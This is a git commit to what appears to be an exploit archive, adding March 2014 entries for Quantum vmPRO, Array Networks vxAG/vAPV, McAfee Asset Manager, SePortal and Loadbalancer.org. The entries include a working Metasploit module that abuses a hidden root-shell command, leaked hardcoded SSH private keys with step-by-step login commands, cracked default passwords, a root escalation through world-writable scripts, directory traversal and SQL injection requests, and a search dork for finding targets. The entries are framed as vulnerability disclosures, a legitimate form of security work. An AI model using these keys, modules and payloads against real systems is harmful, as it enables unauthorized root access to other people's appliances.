From 595a23d463dad4ce0405e105d618e3d9f36c16c0 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 21 Mar 2014 04:32:58 +0000 Subject: [PATCH] Updated 03_21_2014 --- files.csv | 13 +- platforms/hardware/local/32370.txt | 85 ++++++++++ platforms/hardware/webapps/32369.txt | 224 +++++++++++++++++++++++++++ platforms/jsp/webapps/32368.txt | 45 ++++++ platforms/multiple/remote/32362.txt | 9 ++ platforms/multiple/remote/32363.txt | 7 + platforms/php/remote/32359.txt | 44 ++++++ platforms/unix/remote/32367.rb | 136 ++++++++++++++++ platforms/unix/remote/32371.txt | 125 +++++++++++++++ platforms/unix/remote/32372.txt | 95 ++++++++++++ 10 files changed, 781 insertions(+), 2 deletions(-) create mode 100755 platforms/hardware/local/32370.txt create mode 100755 platforms/hardware/webapps/32369.txt create mode 100755 platforms/jsp/webapps/32368.txt create mode 100755 platforms/multiple/remote/32362.txt create mode 100755 platforms/multiple/remote/32363.txt create mode 100755 platforms/php/remote/32359.txt create mode 100755 platforms/unix/remote/32367.rb create mode 100755 platforms/unix/remote/32371.txt create mode 100755 platforms/unix/remote/32372.txt diff --git a/files.csv b/files.csv index cf202eb62..7e1ff696c 100755 --- a/files.csv +++ b/files.csv @@ -13612,7 +13612,7 @@ id,file,description,date,author,platform,type,port 15699,platforms/php/webapps/15699.txt,"PhpMyAdmin Client Side 0Day Code Injection and Redirect Link Falsification",2010-12-06,"emgent white_sheep and scox",php,webapps,80 15701,platforms/php/webapps/15701.txt,"MODx Revolution CMS 2.0.4-pl2 Remote XSS POST Injection Vulnerability",2010-12-06,LiquidWorm,php,webapps,0 15703,platforms/asp/webapps/15703.txt,"SOOP Portal Raven 1.0b Shell Upload Vulnerability",2010-12-07,"Sun Army",asp,webapps,0 -15704,platforms/linux/local/15704.c,"Linux Kernel <= 2.6.37 Local Privilege Escalation",2010-12-07,"Dan Rosenberg",linux,local,0 +15704,platforms/linux/local/15704.c,"Linux Kernel <= 2.6.37 - Local Privilege Escalation",2010-12-07,"Dan Rosenberg",linux,local,0 15705,platforms/linux/dos/15705.txt,"GNU inetutils 1.8-1 - FTP Client Heap Overflow",2010-12-07,Rew,linux,dos,0 15706,platforms/windows/local/15706.txt,"Winamp 5.6 Arbitrary Code Execution in MIDI Parser",2010-12-08,"Kryptos Logic",windows,local,0 15707,platforms/multiple/dos/15707.txt,"Wonderware InBatch <= 9.0sp1 Buffer Overflow Vulnerability",2010-12-08,"Luigi Auriemma",multiple,dos,0 @@ -29055,7 +29055,7 @@ id,file,description,date,author,platform,type,port 32279,platforms/php/webapps/32279.txt,"Vanilla 1.1.4 HTML Injection and Cross-Site Scripting Vulnerabilities",2008-08-19,"James Bercegay",php,webapps,0 32280,platforms/php/webapps/32280.txt,"YourFreeWorld Ad-Exchange Script 'id' Parameter SQL Injection Vulnerability",2008-08-20,"Hussin X",php,webapps,0 32281,platforms/php/webapps/32281.cs,"Folder Lock 5.9.5 Weak Password Encryption Local Information Disclosure Vulnerability",2008-06-19,"Charalambous Glafkos",php,webapps,0 -32282,platforms/php/webapps/32282.txt,"Church Edit Blind SQL Injection",2014-03-15,ThatIcyChill,php,webapps,0 +32282,platforms/php/webapps/32282.txt,"Church Edit - Blind SQL Injection",2014-03-15,ThatIcyChill,php,webapps,0 32283,platforms/php/webapps/32283.txt,"Scripts4Profit DXShopCart 4.30 'pid' Parameter SQL Injection Vulnerability",2008-08-21,"Hussin X",php,webapps,0 32284,platforms/php/webapps/32284.txt,"Simasy CMS 'id' Parameter SQL Injection Vulnerability",2008-08-21,r45c4l,php,webapps,0 32285,platforms/php/webapps/32285.txt,"vBulletin 3.6.10/3.7.2 '$newpm[title]' Parameter Cross-Site Scripting Vulnerability",2008-08-20,"Core Security",php,webapps,0 @@ -29130,8 +29130,17 @@ id,file,description,date,author,platform,type,port 32355,platforms/php/webapps/32355.txt,"Hot Links SQL-PHP 'news.php' SQL Injection Vulnerability",2008-09-10,r45c4l,php,webapps,0 32356,platforms/windows/dos/32356.txt,"ZoneAlarm Security Suite 7.0 AntiVirus Directory Path Buffer Overflow Vulnerability",2008-09-11,"Juan Pablo Lopez Yacubian",windows,dos,0 32358,platforms/windows/local/32358.pl,"MP3Info 0.8.5a - SEH Buffer Overflow Exploit",2014-03-19,"Ayman Sagy",windows,local,0 +32359,platforms/php/remote/32359.txt,"SePortal 2.5 - SQL Injection Vulnerabilty",2014-03-19,jsass,php,remote,0 32360,platforms/php/webapps/32360.txt,"NooMS 1.1 smileys.php page_id Parameter XSS",2008-09-11,Dr.Crash,php,webapps,0 32361,platforms/php/webapps/32361.txt,"NooMS 1.1 search.php q Parameter XSS",2008-09-11,Dr.Crash,php,webapps,0 +32362,platforms/multiple/remote/32362.txt,"Unreal Engine 3 - Failed Memory Allocation Remote Denial of Service Vulnerability",2008-09-12,"Luigi Auriemma",multiple,remote,0 +32363,platforms/multiple/remote/32363.txt,"Epic Games Unreal Engine 436 - Multiple Format String Vulnerabilities",2008-09-11,"Luigi Auriemma",multiple,remote,0 32364,platforms/php/webapps/32364.txt,"Dynamic MP3 Lister 2.0.1 'index.php' Multiple Cross Site Scripting Vulnerabilities",2008-09-12,Xylitol,php,webapps,0 32365,platforms/php/webapps/32365.txt,"Paranews 3.4 Multiple Cross Site Scripting Vulnerabilities",2008-09-12,Xylitol,php,webapps,0 32366,platforms/php/webapps/32366.txt,"QuicO 'photo.php' SQL Injection Vulnerability",2008-09-12,"Beenu Arora",php,webapps,0 +32367,platforms/unix/remote/32367.rb,"Quantum vmPRO - Backdoor Command",2014-03-19,metasploit,unix,remote,22 +32368,platforms/jsp/webapps/32368.txt,"McAfee Asset Manager 6.6 - Multiple Vulnerabilities",2014-03-19,"Brandon Perry",jsp,webapps,80 +32369,platforms/hardware/webapps/32369.txt,"Array Networks vxAG 9.2.0.34 and vAPV 8.3.2.17 - Multiple Vulnerabilities",2014-03-19,xistence,hardware,webapps,0 +32370,platforms/hardware/local/32370.txt,"Quantum vmPRO 3.1.2 - Privilege Escalation",2014-03-19,xistence,hardware,local,0 +32371,platforms/unix/remote/32371.txt,"Loadbalancer.org Enterprise VA 7.5.2 - Static SSH Key",2014-03-19,xistence,unix,remote,0 +32372,platforms/unix/remote/32372.txt,"Quantum DXi V1000 2.2.1 - Static SSH Key",2014-03-19,xistence,unix,remote,22 diff --git a/platforms/hardware/local/32370.txt b/platforms/hardware/local/32370.txt new file mode 100755 index 000000000..a98701cbb --- /dev/null +++ b/platforms/hardware/local/32370.txt @@ -0,0 +1,85 @@ +----------- +Author: +----------- + +xistence < xistence[at]0x90[.]nl > + +------------------------- +Affected products: +------------------------- + +Quantum vmPRO 3.1.2 and below + +------------------------- +Affected vendors: +------------------------- + +Quantum +http://quantum.com/ + +------------------------- +Product description: +------------------------- + +Unlike traditional backup applications and other backup applications +designed for virtual environments, +Quantum vmPRO Software backs up VMs in native VMware format. This enables +users to restore or boot VMs +in seconds without the use of a backup application, reduces virtual server +and network usage by reducing +VM image sizes before backing up those images to backup storage, and +substantially reduces the cost of +using traditional backup applications to back up virtual environments. + +---------- +Details: +---------- + +[ 0x01 - Shell Backdoor Command ] + +The file "/usr/local/pancetera/bin/cmd_processor.py" on the vmPRO 3.1.2 +virtual machine contains the following lines: + + def cmd_shell_escape(self, args): + log_panshell(syslog.LOG_INFO, "internal consistency check started") + env = dict(os.environ) + env['SHELL'] = '/bin/bash' + env['HOME'] = '/tmp' + env['TERM'] = 'xterm' + os.spawnle(os.P_WAIT, '/bin/bash', 'bash', env) + log_panshell(syslog.LOG_INFO, "internal consistency check finished") + return + +This is a hidden command to gain a root shell. If we create a user in the +web interface without administrator rights, +we can still ssh and gain a root shell! This of course should not be +possible and only be accessible to an admin user. + +$ ssh non-admin@192.168.2.112 +non-admin@192.168.2.112's password: +Last login: Thu Dec 19 23:42:10 2013 from 192.168.2.72 +Welcome to Quantum vmPRO Console +-------------------------------- + +Quantum vmPRO GUI: https://192.168.2.112/ + +*** Type 'help' for a list of commands. + +quantum:localhost> shell-escape +bash-4.1# id +uid=0(root) gid=100(users) groups=0(root),100(users) + + +----------- +Solution: +----------- + +Upgrade to version 2.3.0.1 or newer + +-------------- +Timeline: +-------------- + +03-01-2014 - Issues discovered and vendor notified +15-01-2014 - No reply, asked for status update. +17-03-2014 - No replies, public disclosure \ No newline at end of file diff --git a/platforms/hardware/webapps/32369.txt b/platforms/hardware/webapps/32369.txt new file mode 100755 index 000000000..374936235 --- /dev/null +++ b/platforms/hardware/webapps/32369.txt @@ -0,0 +1,224 @@ +----------- +Author: +----------- + +xistence < xistence[at]0x90[.]nl > + +------------------------- +Affected products: +------------------------- + +Array Networks vxAG 9.2.0.34 and vAPV 8.3.2.17 appliances + +------------------------- +Affected vendors: +------------------------- + +Array Networks +http://www.arraynetworks.com/ + +------------------------- +Product description: +------------------------- + +vAPV: +Virtual Application Delivery Controllers for Cloud and Virtualized +Environments +Powered by Array's award-winning 64-bit SpeedCore(tm) architecture, vAPV +virtual application delivery controllers extend Array's +proven price-performance and rich feature set to public and private clouds +and virtualized datacenter environments. +vAPV virtual application delivery controllers give enterprises and service +providers the agility to offer on-demand +load balancing services, dynamically allocate resources to maximize ROI on +application infrastructure and develop and size +new application environments using either private or public clouds. + + +vxAG: +Secure Access Gateways for Enterprise, Cloud & Mobile Environments +Secure access gatewaysSecure access is undergoing dramatic change. With +increasing mobility, growing adoption of cloud +services and a shift in thinking that favors securing data over securing +networks and devices, modern enterprises require +a new breed of secure access solutions. Secure access gateways centralize +control over access to business critical resources, +providing security for data in motion and at rest and enforcing application +level policies on a per user basis. + +The Array AG Series secure access gateway addresses challenges faced by +enterprise, service provider and pubic-sector +organizations in the areas of secure remote and mobile access to +applications and cloud services. Available in a range of +scalable, purpose-built appliances or as a virtual appliance for cloud and +virtualized environments, the AG Series can +support multiple communities of interest, connect users both in the office +and on-the-go and provide access to traditional +enterprise applications as well as services running in public and private +clouds. + + +---------- +Details: +---------- + +[ 0x01 - Default Users/Passwords ] + +The /etc/master.passwd file on the vxAG 9.2.0.34 and vAPV 8.3.2.17 +appliances contain default (unkown to the admin) shell users and passwords. + +$ cat /etc/master.passwd +# $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $ +# +root:$1$9QkJT4Y5$lF2BPaSI2kPlcrqz89yZv0:0:0::0:0:Charlie &:/root:/bin/csh +toor:*:0:0::0:0:Bourne-again Superuser:/root: +daemon:*:1:1::0:0:Owner of many system processes:/root:/usr/sbin/nologin +operator:*:2:5::0:0:System &:/:/usr/sbin/nologin +bin:*:3:7::0:0:Binaries Commands and Source:/:/usr/sbin/nologin +tty:*:4:65533::0:0:Tty Sandbox:/:/usr/sbin/nologin +kmem:*:5:65533::0:0:KMem Sandbox:/:/usr/sbin/nologin +games:*:7:13::0:0:Games pseudo-user:/usr/games:/usr/sbin/nologin +news:*:8:8::0:0:News Subsystem:/:/usr/sbin/nologin +man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/usr/sbin/nologin +sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/usr/sbin/nologin +smmsp:*:25:25::0:0:Sendmail Submission +User:/var/spool/clientmqueue:/usr/sbin/nologin +mailnull:*:26:26::0:0:Sendmail Default +User:/var/spool/mqueue:/usr/sbin/nologin +bind:*:53:53::0:0:Bind Sandbox:/:/usr/sbin/nologin +proxy:*:62:62::0:0:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin +_pflogd:*:64:64::0:0:pflogd privsep user:/var/empty:/usr/sbin/nologin +_dhcp:*:65:65::0:0:dhcp programs:/var/empty:/usr/sbin/nologin +uucp:*:66:66::0:0:UUCP +pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico +pop:*:68:6::0:0:Post Office Owner:/nonexistent:/usr/sbin/nologin +www:*:80:80::0:0:World Wide Web Owner:/nonexistent:/usr/sbin/nologin +nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/usr/sbin/nologin +test:$1$UtEw8DNY$te4MRasnXgETxWOZ9Z1o10:1002:1002::0:0:test:/export/test:/bin/tcsh +sync:$1$bmfGRJPh$lWnesbn8M8xZNo3uaqfEd1:1005:0::0:0:sync:/export/sync:/bin/sh +recovery::65533:0::0:0:Recovery User:/:/ca/bin/recovery +mfg:$1$i8SV4bKc$lNMeb8Yow.p.cZvWxt1mO1:1013:1010::0:0:mfg:/export/mfg:/bin/tcsh +arraydb:*:1015:0::0:0:User &:/home/arraydb:/bin/sh +array::1016:1011::0:0:User &:/:/ca/bin/ca_shell + +Doing a quick password crack, the passwords for the mfg and sync are +revealed: + +User: mfg Password: mfg +User: sync Password: click1 + +The passwords for "test" and "root" couldn't be cracked in a short time. + + +Below an example of logging in with the user "sync" and password "click1" +via SSH. + +$ ssh sync@192.168.2.55 /bin/sh +sync@192.168.2.55's password: +id +uid=1005(sync) gid=0(wheel) groups=0(wheel) + + +[ 0x02 - SSH Private Key ] + +The "sync" user also contains a private key in "~/.ssh/id_dsa": + +$ cat id_dsa +-----BEGIN DSA PRIVATE KEY----- +MIIBugIBAAKBgQCUw7F/vKJT2Xsq+fIPVxNC/Dyk+dN9DWQT5RO56eIQasd+h6Fm +q1qtQrJ/DOe3VjfUrSm7NN5NoIGOrGCSuQFthFmq+9Lpt6WIykB4mau5iE5orbKM +xTfyu8LtntoikYKrlMB+UrmKDidvZ+7oWiC14imT+Px/3Q7naj0UmOrSTwIVAO25 +Yf3SYNtTYv8yzaV+X9yNr/AfAoGADAcEh2bdsrDhwhXtVi1L3cFQx1KpN0B07JLr +gJzJcDLUrwmlMUmrXR2obDGfVQh46EFMeo/k3IESw2zJUS58FJW+sKZ4noSwRZPq +mpBnERKpLOTcWMxUyV8ETsz+9oz71YEMjmR1qvNYAopXf5Yy+4Zq3bgqmMMQyM+K +O1PdlCkCgYBmhSl9CVPgVMv1xO8DAHVhM1huIIK8mNFrzMJz+JXzBx81ms1kWSeQ +OC/nraaXFTBlqiQsvB8tzr4xZdbaI/QzVLKNAF5C8BJ4ScNlTIx1aZJwyMil8Nzb ++0YAsw5Ja+bEZZvEVlAYnd10qRWrPeEY1txLMmX3wDa+JvJL7fmuBgIUZoXsJnzs ++sqSEhA35Le2kC4Y1/A= +-----END DSA PRIVATE KEY----- + +The following authorized keys file are there in the ~/.ssh directory: + +$ cat authorized_keys +1024 35 +117781646131320088945310945996213112717535690524599971400605193647439008360689916421327587459429042579662784434303538942896683338584760112042194838342054595473085094045804963620754645364924583113650482968246287214031112796524662479539236259838315876244144983122361617319660444993650437402628793785173700484401 +sync@AN + +$ cat authorized_keys2 +ssh-dss +AAAAB3NzaC1kc3MAAACBAJTDsX+8olPZeyr58g9XE0L8PKT5030NZBPlE7np4hBqx36HoWarWq1Csn8M57dWN9StKbs03k2ggY6sYJK5AW2EWar70um3pYjKQHiZq7mITmitsozFN/K7wu2e2iKRgquUwH5SuYoOJ29n7uhaILXiKZP4/H/dDudqPRSY6tJPAAAAFQDtuWH90mDbU2L/Ms2lfl/cja/wHwAAAIAMBwSHZt2ysOHCFe1WLUvdwVDHUqk3QHTskuuAnMlwMtSvCaUxSatdHahsMZ9VCHjoQUx6j+TcgRLDbMlRLnwUlb6wpniehLBFk+qakGcREqks5NxYzFTJXwROzP72jPvVgQyOZHWq81gCild/ljL7hmrduCqYwxDIz4o7U92UKQAAAIBmhSl9CVPgVMv1xO8DAHVhM1huIIK8mNFrzMJz+JXzBx81ms1kWSeQOC/nraaXFTBlqiQsvB8tzr4xZdbaI/QzVLKNAF5C8BJ4ScNlTIx1aZJwyMil8Nzb+0YAsw5Ja+bEZZvEVlAYnd10qRWrPeEY1txLMmX3wDa+JvJL7fmuBg== +sync@AN + +This makes it possible to use the private key to login without a password. +Do the following on a different system: + +Insert the id_dsa private key in a file called "synckey": + +cat > ~/synckey << EOF +-----BEGIN DSA PRIVATE KEY----- +MIIBugIBAAKBgQCUw7F/vKJT2Xsq+fIPVxNC/Dyk+dN9DWQT5RO56eIQasd+h6Fm +q1qtQrJ/DOe3VjfUrSm7NN5NoIGOrGCSuQFthFmq+9Lpt6WIykB4mau5iE5orbKM +xTfyu8LtntoikYKrlMB+UrmKDidvZ+7oWiC14imT+Px/3Q7naj0UmOrSTwIVAO25 +Yf3SYNtTYv8yzaV+X9yNr/AfAoGADAcEh2bdsrDhwhXtVi1L3cFQx1KpN0B07JLr +gJzJcDLUrwmlMUmrXR2obDGfVQh46EFMeo/k3IESw2zJUS58FJW+sKZ4noSwRZPq +mpBnERKpLOTcWMxUyV8ETsz+9oz71YEMjmR1qvNYAopXf5Yy+4Zq3bgqmMMQyM+K +O1PdlCkCgYBmhSl9CVPgVMv1xO8DAHVhM1huIIK8mNFrzMJz+JXzBx81ms1kWSeQ +OC/nraaXFTBlqiQsvB8tzr4xZdbaI/QzVLKNAF5C8BJ4ScNlTIx1aZJwyMil8Nzb ++0YAsw5Ja+bEZZvEVlAYnd10qRWrPeEY1txLMmX3wDa+JvJL7fmuBgIUZoXsJnzs ++sqSEhA35Le2kC4Y1/A= +-----END DSA PRIVATE KEY----- +EOF + +Change the rights of the file: + +chmod 600 ~/synckey + +SSH into the vxAG or vAPV appliance (change the IP below): + +ssh -i ~/synckey sync@192.168.2.55 /bin/sh + +Now you won't see a command prompt, but you can enter an "id" for example +and you'll get: + +uid=1005(sync) gid=0(wheel) groups=0(wheel) + + +[ 0x03 - Root Privilege Escalation ] + +The last issue is that the files "/ca/bin/monitor.sh" and +"/ca/bin/debug_syn_stat" are world writable (chmod 777). Any user can write +to these files. +As the sync user it's possible to write to these files. If you write +arbitrary commands to the monitor.sh script and then turn the debug +monitoring off and on it will restart the script with root privileges. +The sync user is able to run the /ca/bin/backend tool to execute CLI +commands. Below how it's possible to turn the debug monitor off and on: + +Turn debug monitor off: +/ca/bin/backend -c "debug monitor off"`echo -e "\0374"` + +Turn debug monitor on: +/ca/bin/backend -c "debug monitor on"`echo -e "\0374"` + +Thus through combining the SSH private key issue and the world writable +file + unrestricted backend tool it's possible to gain a remote root shell. + + +----------- +Solution: +----------- + +Upgrade to newer versions + +Workaround: Change passwords and SSH key. Do a chmod 700 on the world +writable file. + +-------------- +Timeline: +-------------- + +03-02-2014 - Issues discovered and vendor notified +08-02-2014 - Vendor replies "Thank you very much for bringing this to our +attention." +12-02-2014 - Asked vendor for status updates and next steps. +17-03-2014 - No replies, public disclosure \ No newline at end of file diff --git a/platforms/jsp/webapps/32368.txt b/platforms/jsp/webapps/32368.txt new file mode 100755 index 000000000..1256dcca2 --- /dev/null +++ b/platforms/jsp/webapps/32368.txt @@ -0,0 +1,45 @@ +Cloud SSO is vuln to unauthed XSS in the authentication audit form: + +https://twitter.com/BrandonPrry/status/445969380656943104 + +McAfee Asset Manager v6.6 multiple vulnerabilities + +http://www.mcafee.com/us/products/asset-manager.aspx + +Authenticated arbitrary file read +An unprivileged authenticated user can download arbitrary files with the permissions of the web server using the report download functionality. +By generating a report, the user's browser will make a request to /servlet/downloadReport?reportFileName=blah. The user can put in a relative directory traversal attack and download /etc/passwd. + +GET /servlet/downloadReport?reportFileName=../../../../../../../../etc/passwd&format=CSV HTTP/1.1 +Host: 172.31.16.167 +User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:26.0) Gecko/20100101 Firefox/26.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: https://172.31.16.167/Inventory?filterColumns=&curViewId=-1&maintainQuery=true&format=search&collectorId=null&criticality=0&pageNum=1&location=Inventory&viewSelect=-999999&filterValueField=&orderBy=FIREWALLED&orderBy2=SITE&orderBy3=CRITICALITY_NAME&wsz=200&wszCtrl_1=200&action=AUDIT_REDISCOVER&formatSelect= +Cookie: JSESSIONID=F92156C7962D8276FC4BF11CEA8FB554 +Connection: keep-alive + + +Authenticated SQL injection + +An unprivileged authenticated user can initiate a SQL injection attack by creating an audit report and controlling the username specified in the audit report. In the below request, the 'user' parameter is susceptible to the SQL injection: + +POST /jsp/reports/ReportsAudit.jsp HTTP/1.1 +Host: 172.31.16.167 +User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:26.0) Gecko/20100101 Firefox/26.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: https://172.31.16.167/jsp/reports/ReportsAudit.jsp +Cookie: JSESSIONID=F92156C7962D8276FC4BF11CEA8FB554 +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 91 + +fromDate=03-19-2014&toDate=03-19-2014&freetext=&Severity=0&AuditType=12&user=Administrator + + +-- +http://volatile-minds.blogspot.com -- blog +http://www.volatileminds.net -- website \ No newline at end of file diff --git a/platforms/multiple/remote/32362.txt b/platforms/multiple/remote/32362.txt new file mode 100755 index 000000000..f5b7b8abc --- /dev/null +++ b/platforms/multiple/remote/32362.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/31140/info + +Unreal Engine is prone to a remote denial-of-service vulnerability because of an error in memory allocation. + +An attacker could exploit this issue to crash applications that use the vulnerable engine and deny service to legitimate users. + +This issue affects Unreal Engine 3; other versions may also be affected. + +http://www.exploit-db.com/sploits/32362.zip \ No newline at end of file diff --git a/platforms/multiple/remote/32363.txt b/platforms/multiple/remote/32363.txt new file mode 100755 index 000000000..18b74941a --- /dev/null +++ b/platforms/multiple/remote/32363.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/31141/info + +Unreal Engine is prone to multiple remote format-string vulnerabilities. + +Attackers can exploit the issues to execute arbitrary code within the context of a client application that uses the vulnerable engine. + +http://www.exploit-db.com/sploits/32363.zip \ No newline at end of file diff --git a/platforms/php/remote/32359.txt b/platforms/php/remote/32359.txt new file mode 100755 index 000000000..435ff02f3 --- /dev/null +++ b/platforms/php/remote/32359.txt @@ -0,0 +1,44 @@ +#################################################################### +Exploit: SePortal 2.5 Sql Injection Vulnerabilty +Author: jsass +Date : 19\03\2014 +Contact Twitter: @Kwsecurity +Script: http://www.seportal.org/ +version: 2.5 +Tested on: Linux Ubuntu 12.4 & Windows 7 +Dork : "Powered by SePortal 2.5" + +//** Searching And Analysis By Kuwaity Crew **\\ + +#################################################################### + SQL INJECTION Vulnerabilty + + code : + $main_template = 'staticpages'; + +define('GET_CACHES', 1); +define('ROOT_PATH', './'); +define('GET_USER_ONLINE', 1); +define('GET_STATS_BOX', 1); +include(ROOT_PATH.'global.php'); +require(ROOT_PATH.'includes/sessions.php'); + + $sql = "SELECT * + FROM ".STATICPAGE_TABLE." + WHERE sp_id = '".$sp_id."'"; + $result = $site_db->query($sql); + + files: + staticpages.php?sp_id=(inject here) + print.php?mode=staticpage&client=printer&sp_id=(inject here) + +example: + +http://localhost/seportal2.5/staticpages.php?sp_id=1%27%20%20and+extractvalue%28rand%28%29,concat%280x7e,version%28%29%29%29--%20- + +////////////////////////////////////////////////////////////////////////////////// + + + + + Greats: dzkabyle & Mr.Exit & massacreur & rDNix & hamza & Q8 Spy & ????? ?????? & medo medo & sec4ever.com & is-sec.com \ No newline at end of file diff --git a/platforms/unix/remote/32367.rb b/platforms/unix/remote/32367.rb new file mode 100755 index 000000000..d9fad3177 --- /dev/null +++ b/platforms/unix/remote/32367.rb @@ -0,0 +1,136 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'net/ssh' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Auxiliary::CommandShell + + def initialize(info={}) + super(update_info(info, + 'Name' => "Quantum vmPRO Backdoor Command", + 'Description' => %q{ + This module abuses a backdoor command in vmPRO 3.1.2. Any user, even without admin + privileges, can get access to the restricted SSH shell. By using the hidden backdoor + "shell-escape" command it's possible to drop to a real root bash shell. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'xistence ' # Original discovery and Metasploit module + ], + 'References' => + [ + ['URL', 'http://packetstormsecurity.com/files/125760/quantumvmpro-backdoor.txt'] + ], + 'DefaultOptions' => + { + 'ExitFunction' => "none" + }, + 'Payload' => + { + 'Compat' => { + 'PayloadType' => 'cmd_interact', + 'ConnectionType' => 'find' + } + }, + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Targets' => + [ + ['Quantum vmPRO 3.1.2', {}], + ], + 'Privileged' => true, + 'DisclosureDate' => "Mar 17 2014", + 'DefaultTarget' => 0)) + + register_options( + [ + Opt::RHOST(), + Opt::RPORT(22), + OptString.new('USER', [ true, 'vmPRO SSH user', 'sysadmin']), + OptString.new('PASS', [ true, 'vmPRO SSH password', 'sysadmin']) + ], self.class + ) + + register_advanced_options( + [ + OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]), + OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30]) + ] + ) + end + + + def rhost + datastore['RHOST'] + end + + + def rport + datastore['RPORT'] + end + + + def do_login(user, pass) + opts = { + :auth_methods => ['password', 'keyboard-interactive'], + :msframework => framework, + :msfmodule => self, + :port => rport, + :disable_agent => true, + :config => true, + :password => pass, + :record_auth_info => true, + :proxies => datastore['Proxies'] + } + + opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG'] + + begin + ssh = nil + ::Timeout.timeout(datastore['SSH_TIMEOUT']) do + ssh = Net::SSH.start(rhost, user, opts) + end + rescue Rex::ConnectionError, Rex::AddressInUse + return nil + rescue Net::SSH::Disconnect, ::EOFError + print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation" + return nil + rescue ::Timeout::Error + print_error "#{rhost}:#{rport} SSH - Timed out during negotiation" + return nil + rescue Net::SSH::AuthenticationFailed + print_error "#{rhost}:#{rport} SSH - Failed authentication" + return nil + rescue Net::SSH::Exception => e + print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}" + return nil + end + + if ssh + conn = Net::SSH::CommandStream.new(ssh, 'shell-escape', true) + return conn + end + + return nil + end + + + def exploit + user = datastore['USER'] + pass = datastore['PASS'] + + print_status("#{rhost}:#{rport} - Attempt to login...") + conn = do_login(user, pass) + if conn + print_good("#{rhost}:#{rport} - Login Successful with '#{user}:#{pass}'") + handler(conn.lsock) + end + end +end \ No newline at end of file diff --git a/platforms/unix/remote/32371.txt b/platforms/unix/remote/32371.txt new file mode 100755 index 000000000..df4b37cdc --- /dev/null +++ b/platforms/unix/remote/32371.txt @@ -0,0 +1,125 @@ +----------- +Author: +----------- + +xistence < xistence[at]0x90[.]nl > + +------------------------- +Affected products: +------------------------- + +Loadbalancer.org Enterprise VA 7.5.2 and below + +------------------------- +Affected vendors: +------------------------- + +Loadbalancer.org +http://www.loadbalancer.org/ + +------------------------- +Product description: +------------------------- + +The Loadbalancer.org Virtual Appliance is a revolution in software load +balancing. The software is simple to install on Windows, Mac & Linux and +does not have any adverse effects on the host operating system. + +---------- +Details: +---------- + +[ 0x01 - SSH Private Key ] + +Loadbalancer.org Enterprise VA 7.5.2 contains a default SSH private key: + +[root@lbmaster .ssh]# cat id_dsa +-----BEGIN DSA PRIVATE KEY----- +MIIBugIBAAKBgQCsCgcOw+DgNR/7g+IbXYdOEwSB3W0o3l1Ep1ibHHvAtLb6AdNW +Gq47/UxY/rX3g2FVrVCtQwNSZMqkrqALQwDScxeCOiLMndCj61t3RxU3IOl5c/Hd +yhGh6JGPdzTpgf8VhJIZnvG+0NFNomYntqYFm0y11dBQPpYbJE7Tx1t/lQIVANHJ +rJSVVkpcTB4XdtR7TfO317xVAoGABDytZN2OhKwGyJfenZ1Ap2Y7lkO8V8tOtqX+ +t0LkViOi2ErHJt39aRJJ1lDRa/3q0NNqZH4tnj/bh5dUyNapflJiV94N3637LCzW +cFlwFtJvD22Nx2UrPn+YXrzN7mt9qZyg5m0NlqbyjcsnCh4vNYUiNeMTHHW5SaJY +TeYmPP8CgYAjEe5+0m/TlBtVkqQbUit+s/g+eB+PFQ+raaQdL1uztW3etntXAPH1 +MjxsAC/vthWYSTYXORkDFMhrO5ssE2rfg9io0NDyTIZt+VRQMGdi++dH8ptU+ldl +2ZejLFdTJFwFgcfXz+iQ1mx6h9TPX1crE1KoMAVOj3yKVfKpLB1EkAIUCsG3dIJH +SzmJVCWFyVuuANR2Bnc= +-----END DSA PRIVATE KEY----- + +And a authorized_keys2: + +[root@lbmaster .ssh]# cat authorized_keys2 +ssh-dss +AAAAB3NzaC1kc3MAAACBAKwKBw7D4OA1H/uD4htdh04TBIHdbSjeXUSnWJsce8C0tvoB01Yarjv9TFj+tfeDYVWtUK1DA1JkyqSuoAtDANJzF4I6Isyd0KPrW3dHFTcg6Xlz8d3KEaHokY93NOmB/xWEkhme8b7Q0U2iZie2pgWbTLXV0FA+lhskTtPHW3+VAAAAFQDRyayUlVZKXEweF3bUe03zt9e8VQAAAIAEPK1k3Y6ErAbIl96dnUCnZjuWQ7xXy062pf63QuRWI6LYSscm3f1pEknWUNFr/erQ02pkfi2eP9uHl1TI1ql+UmJX3g3frfssLNZwWXAW0m8PbY3HZSs+f5hevM3ua32pnKDmbQ2WpvKNyycKHi81hSI14xMcdblJolhN5iY8/wAAAIAjEe5+0m/TlBtVkqQbUit+s/g+eB+PFQ+raaQdL1uztW3etntXAPH1MjxsAC/vthWYSTYXORkDFMhrO5ssE2rfg9io0NDyTIZt+VRQMGdi++dH8ptU+ldl2ZejLFdTJFwFgcfXz+iQ1mx6h9TPX1crE1KoMAVOj3yKVfKpLB1EkA== +root@lbslave + + +The manual says the following: + +--- +Appliance Security 